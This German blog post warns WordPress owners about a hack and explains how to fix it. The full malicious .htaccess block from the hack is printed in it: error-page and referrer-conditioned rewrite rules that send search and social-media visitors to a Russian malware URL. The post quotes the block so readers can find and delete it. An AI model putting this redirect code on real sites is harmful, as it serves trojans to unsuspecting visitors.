Veröffentlicht von Nach einem Hackerangriff wurde unsere Webseite gezielt, bei vorherigem Besuch von verschiedenen anderen Seiten eingebettet z.B. google, ask.com, facebook, youtube.com und twitter.
Der Hacker hat die .htaccess Datei im Root-Verzeichnis des WordPress geändert so daß die Seite auf timeconnection.ru/cfgen/index.php weiterleitet, wo ein JavaScript versucht, auf dem Betrachterrechner einen Virus einzurichten. Laut Avira AntiVir handelt es sich sich um den Trojaner TR/Crypt.XPACK.Gen .
Um das zu beheben:
Öffnen Sie Ihre /.htaccess mit dem Texteditor.
Folgende Zeilen enthalten den Schadcode und sind zu löschen!!!!
Ändern Sie danach alle Kennwörter mit Zugriff auf Ihre Domains!!!
Schadcode:
# BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # END WordPress RewriteEngine On ErrorDocument 400 http://timeconnection.ru/cfgen/index.php ErrorDocument 401 http://timeconnection.ru/cfgen/index.php ErrorDocument 403 http://timeconnection.ru/cfgen/index.php ErrorDocument 404 http://timeconnection.ru/cfgen/index.php ErrorDocument 500 http://timeconnection.ru/cfgen/index.php RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*baidu.* [OR] RewriteCond %{HTTP_REFERER} .*youtube.* [OR] RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] RewriteCond %{HTTP_REFERER} .*qq.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] RewriteCond %{HTTP_REFERER} .*mamma.* [OR] RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] RewriteCond %{HTTP_REFERER} .*lycos.* [OR] RewriteCond %{HTTP_REFERER} .*search.* [OR] RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] RewriteCond %{HTTP_REFERER} .*bing.* [OR] RewriteCond %{HTTP_REFERER} .*dogpile.* [OR] RewriteCond %{HTTP_REFERER} .*facebook.* [OR] RewriteCond %{HTTP_REFERER} .*twitter.* [OR] RewriteCond %{HTTP_REFERER} .*blog.* [OR] RewriteCond %{HTTP_REFERER} .*live.* [OR] RewriteCond %{HTTP_REFERER} .*myspace.* [OR] RewriteCond %{HTTP_REFERER} .*mail.* [OR] RewriteCond %{HTTP_REFERER} .*yandex.* [OR] RewriteCond %{HTTP_REFERER} .*rambler.* [OR] RewriteCond %{HTTP_REFERER} .*ya.* [OR] RewriteCond %{HTTP_REFERER} .*aport.* [OR] RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] RewriteCond %{HTTP_REFERER} .*flickr.* RewriteRule ^(.*)$ http://timeconnection.ru/cfgen/index.php [R=301,L]
Löschen Sie diesen Code!!!
Armin Fischer
AFD-PC-SERVICE.de Armin Fischer
Armin Fischer
info@arminfischer.de
+4917621008967
Ein Kommentar